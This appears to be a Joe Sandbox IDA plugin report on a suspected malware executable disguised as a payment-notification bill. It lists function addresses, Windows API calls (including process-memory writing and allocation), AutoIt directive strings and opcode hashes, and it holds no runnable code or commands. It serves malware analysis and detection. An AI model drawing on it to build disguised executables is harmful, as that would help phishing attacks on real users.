Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: b25c437a7d42f40e2c02104e599d48b265ceb44214b8e76b1cb463dfa4cd0942
Instruction ID: 4b4b32fc6dec7802c8c9f2545416b56f409d9b97f2d527805383b63d1fae3909
Opcode Fuzzy Hash: b25c437a7d42f40e2c02104e599d48b265ceb44214b8e76b1cb463dfa4cd0942
Instruction Fuzzy Hash: 88018171514B04ABEB315B50DDCEFA67BB8BB00B06F01065DA587A10E2DBF4A9849B91

Function 009122A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 009122BE

Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0

_free.LIBCMT ref: 009122D0
_free.LIBCMT ref: 009122E3
_free.LIBCMT ref: 009122F4
_free.LIBCMT ref: 00912305

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 404891bbf46c184d92088de19240ef68918ab9c5fe3e7624ba6743c37f0335e1
Instruction ID: 68bea41e04053ae7569400429ae437f282db00b8d11a60131578e28380d114b8
Opcode Fuzzy Hash: 404891bbf46c184d92088de19240ef68918ab9c5fe3e7624ba6743c37f0335e1
Instruction Fuzzy Hash: A9F03AB1A282248BC616BF58BE019AD3FA4FB59771740070AF430DA2B1C73548B1BBE4

Function 008F95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 008F95D4
StrokeAndFillPath.GDI32(?,?,009371F7,00000000,?,?,?), ref: 008F95F0
SelectObject.GDI32(?,00000000), ref: 008F9603
DeleteObject.GDI32 ref: 008F9616
StrokePath.GDI32(?), ref: 008F9631

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 3797950b9472eb6d56d34c3a47183b21e495b1d1edeecbcb82e7ab96b0ddc230
Instruction ID: 676f406da0c2c9281bffe247fc9731387b58e432043e1f151bb74756a719bbd0
Opcode Fuzzy Hash: 3797950b9472eb6d56d34c3a47183b21e495b1d1edeecbcb82e7ab96b0ddc230
Instruction Fuzzy Hash: CDF0193102D248EBDB225F65EE287A43B65FB11376F548318F569950F0C7348991EF60

Function 00910F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 009110F9
__freea.LIBCMT ref: 00911117

Part of subcall function 00911537: _free.LIBCMT ref: 0091154F

Strings

a/p, xrefs: 009111DE
am/pm, xrefs: 0091117A

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 15ca09828b272925f98998eb687bd8018f88a2ebf4ef50a0a96fd1410ee454a7
Instruction ID: e34787312a8f83ce7f66e36d1297a9aa0abd4b6dd557678a4723a6e4106e3de3
Opcode Fuzzy Hash: 15ca09828b272925f98998eb687bd8018f88a2ebf4ef50a0a96fd1410ee454a7
Instruction Fuzzy Hash: 9CD1E131B0420EFADB289F68C845BFAB7B9EF05300F284559E7219B654D3799DC2CB91

Function 00967B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00900242: EnterCriticalSection.KERNEL32(009B070C,009B1884,?,?,008F198B,009B2518,?,?,?,008E12F9,00000000), ref: 0090024D
Part of subcall function 00900242: LeaveCriticalSection.KERNEL32(009B070C,?,008F198B,009B2518,?,?,?,008E12F9,00000000), ref: 0090028A

Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD

Part of subcall function 009000A3: __onexit.LIBCMT ref: 009000A9

__Init_thread_footer.LIBCMT ref: 00967BFB

Part of subcall function 009001F8: EnterCriticalSection.KERNEL32(009B070C,?,?,008F8747,009B2514), ref: 00900202
Part of subcall function 009001F8: LeaveCriticalSection.KERNEL32(009B070C,?,008F8747,009B2514), ref: 00900235

Strings

Variable must be of type 'Object'., xrefs: 00967C3A
G, xrefs: 00967C7F
5, xrefs: 00967C78

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: 984d748d1fb92ce812d1025fcbcf72114789c38f34ca235a0ec87c60f9d1f3ae
Instruction ID: 05daefdea16bbd658461f8a1bf3f753f836e3474a36151c573604fb53ee8a55b
Opcode Fuzzy Hash: 984d748d1fb92ce812d1025fcbcf72114789c38f34ca235a0ec87c60f9d1f3ae
Instruction Fuzzy Hash: A491AC70A04208EFCB14EF98C991DBDB7B5FF89308F108459F8469B292DB75AE41CB51

Function 00942716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0094B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009421D0,?,?,00000034,00000800,?,00000034), ref: 0094B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00942760

Part of subcall function 0094B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009421FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0094B3F8

Part of subcall function 0094B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0094B355
Part of subcall function 0094B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00942194,00000034,?,?,00001004,00000000,00000000), ref: 0094B365
Part of subcall function 0094B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00942194,00000034,?,?,00001004,00000000,00000000), ref: 0094B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009427CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0094281A

Strings

@, xrefs: 00942832

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 3e1503ba381c506eb713d236356bcff0746655636dc43d6b4a0320812ddc6d61
Instruction ID: e6e7ab810fcea78c653cb92e05509a8e269e3452d550b5b290b59aa38b24d868
Opcode Fuzzy Hash: 3e1503ba381c506eb713d236356bcff0746655636dc43d6b4a0320812ddc6d61
Instruction Fuzzy Hash: EF410C72901218AEDB10DFA4C985FEEBBB8AF45700F104099FA55B7191DB70AE85CB61

Function 0091172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe,00000104), ref: 00911769
_free.LIBCMT ref: 00911834
_free.LIBCMT ref: 0091183E

Strings

C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, xrefs: 00911760, 00911767, 00911796, 009117CE

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe
API String ID: 2506810119-1769530631
Opcode ID: 4eb249cbb6f88367414cb571223020698da193d01848f0fe34ea41711dff6a37
Instruction ID: 3df2ea220abb2945e825f007b7815390c7665d701efedd2ca5b58a51819e7361
Opcode Fuzzy Hash: 4eb249cbb6f88367414cb571223020698da193d01848f0fe34ea41711dff6a37
Instruction Fuzzy Hash: AA318E71B0421CBFDB21DF999981EDEBBFCEB85320B5041A6F91497251D6708E80DB90

Function 0094C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0094C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0094C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009B1990,01997190), ref: 0094C395

Strings

0, xrefs: 0094C2DF

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 5927d0474dcb6b95bb4fe496040508c4c4d5485e5f6f0b7c7c3bd3fc4f8c552f
Instruction ID: 24b1ffb55821fd2237094797f486913d7ddd482b1fb6df4cfa4ce9587f82889f
Opcode Fuzzy Hash: 5927d0474dcb6b95bb4fe496040508c4c4d5485e5f6f0b7c7c3bd3fc4f8c552f
Instruction Fuzzy Hash: 0741C3B22093019FD720DF25D844F1ABBE8EF85711F008A1DF9A5972D1D770E904CB62

Function 00974416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0097CC08,00000000,?,?,?,?), ref: 009744AA
GetWindowLongW.USER32 ref: 009744C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 009744D7

Strings

SysTreeView32, xrefs: 0097447C

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: df5f5b4666d1d4a68a3329a2074314080f2db72e0f152c967e7bf7a00478dcb0
Instruction ID: 08d2b3f34708a84ba2e9513359b158b8be7ab94b61b10f0c2b8e3194061db798
Opcode Fuzzy Hash: df5f5b4666d1d4a68a3329a2074314080f2db72e0f152c967e7bf7a00478dcb0
Instruction Fuzzy Hash: EF318F72214605AFDF218E38DC45BEA77A9EB49334F208715F979D21E1DB70EC90AB50

Function 0096304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0096335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00963077,?,?), ref: 00963378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0096307A
_wcslen.LIBCMT ref: 0096309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00963106

Strings

255.255.255.255, xrefs: 00963095, 0096309A

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: ccf7c189b4a9d92af62d3caba4f18cc0561bb1fc336810f576e5841cd5384eff
Instruction ID: c7a38d3f974b15b4f72775757170495dd8a8833e9aa3258da27ffd11a14ac71b
Opcode Fuzzy Hash: ccf7c189b4a9d92af62d3caba4f18cc0561bb1fc336810f576e5841cd5384eff
Instruction Fuzzy Hash: 0F3104352042019FCB20CF28C485EAA77E4EF55318F25C059E9158F392CB72EF85C761

Function 00973EB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00973F40
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00973F54
SendMessageW.USER32(?,00001002,00000000,?), ref: 00973F78

Strings

SysMonthCal32, xrefs: 00973F0B

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: d4d6c26b171c1da44e53fb54db22b288bdcf03247ec36cee92aa8f5b3aff9dbc
Instruction ID: 6e8f9a6c27e5343160ca477f9ad74ef4ffab9c40f1424ff2cb734bb0d5823f0a
Opcode Fuzzy Hash: d4d6c26b171c1da44e53fb54db22b288bdcf03247ec36cee92aa8f5b3aff9dbc
Instruction Fuzzy Hash: DF21BF33610219BFEF118F50CC46FEA3B79EF88754F114214FA19AB1D0D6B1A8909B90

Function 00974653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00974705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00974713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0097471A

Strings

msctls_updown32, xrefs: 00974684

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: bed3365a7e529818688dc13c7a4419e00eeb9da0bbf7e6453ef26212a68ae325
Instruction ID: 43f29ceb5d918ee2193e684f15ed106b3541d3395f517db4070885c54efdb04b
Opcode Fuzzy Hash: bed3365a7e529818688dc13c7a4419e00eeb9da0bbf7e6453ef26212a68ae325
Instruction Fuzzy Hash: 7121A1B6604209AFDB14DF68DCD1DB737ADEF8A7A8B004149FA049B251CB30EC11DB60

Function 009495AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0094961D

Strings

#requireadmin, xrefs: 009495D9
#OnAutoItStartRegister, xrefs: 009495F3
#notrayicon, xrefs: 009495B7

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: f0a810c551f3e17cff52239dd69723fac37a21bdb4b4e4993124cb5cd042a5c0
Instruction ID: 86ae42afa664ef09d8a97a2c44420ca9eea450817f9a8cf6f0a66cbe774958f7
Opcode Fuzzy Hash: f0a810c551f3e17cff52239dd69723fac37a21bdb4b4e4993124cb5cd042a5c0
Instruction Fuzzy Hash: 612157722142506AC335BB29EC16FBB73DCEFA1324F10842AFD49DB081EB55AD81C295

Function 009737B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00973840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00973850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00973876

Strings

Listbox, xrefs: 0097380F

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 33db41532a0e7ac4da6ddbe3a12b75bc7b7dd8ef280580b4940a0172b857038f
Instruction ID: 41b57ecb5a83baf6cabb7e7de5f8e4894489d1b54abe52abeeb126b6bc9500f0
Opcode Fuzzy Hash: 33db41532a0e7ac4da6ddbe3a12b75bc7b7dd8ef280580b4940a0172b857038f
Instruction Fuzzy Hash: F721B073610118BBEF118F54CC85FAB376EEF89764F10C114F9089B190C671DC5297A0

Function 009549F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00954A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00954A5C
SetErrorMode.KERNEL32(00000000,?,?,0097CC08), ref: 00954AD0

Strings

%lu, xrefs: 00954A6F

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: e96bd08b8e63a2cce8f4c3d60366269800e8357efb479ae700b6a9ae56d683b6
Instruction ID: 48e1c76efc9cacd0eb85b10e9d6974a897a4c66f71fc10f414eba1c42d79f59b
Opcode Fuzzy Hash: e96bd08b8e63a2cce8f4c3d60366269800e8357efb479ae700b6a9ae56d683b6
Instruction Fuzzy Hash: CA319171A00108AFDB50DF68C881EAE7BF8EF49308F1480A8F909DB252D771ED85CB61

Function 009741EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0097424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00974264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00974271

Strings

msctls_trackbar32, xrefs: 00974226

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 7f3bf888f23b1ee078984f1650eea93ca23d74249ff4dcc165b4fd2ded4f7566
Instruction ID: f39e6257e8410f108ee74142c0b0012b96d01b82f48c3703d89757dfdd460d9a
Opcode Fuzzy Hash: 7f3bf888f23b1ee078984f1650eea93ca23d74249ff4dcc165b4fd2ded4f7566
Instruction Fuzzy Hash: A8110632344248BEEF205F69CC06FAB3BACEF95B64F114514FA59E20A1D371DC619B54

Function 00942F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A

Part of subcall function 00942DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00942DC5
Part of subcall function 00942DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00942DD6
Part of subcall function 00942DA7: GetCurrentThreadId.KERNEL32 ref: 00942DDD
Part of subcall function 00942DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00942DE4

GetFocus.USER32 ref: 00942F78

Part of subcall function 00942DEE: GetParent.USER32(00000000), ref: 00942DF9

GetClassNameW.USER32(?,?,00000100), ref: 00942FC3
EnumChildWindows.USER32(?,0094303B), ref: 00942FEB

Strings

%s%d, xrefs: 00942FFF

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

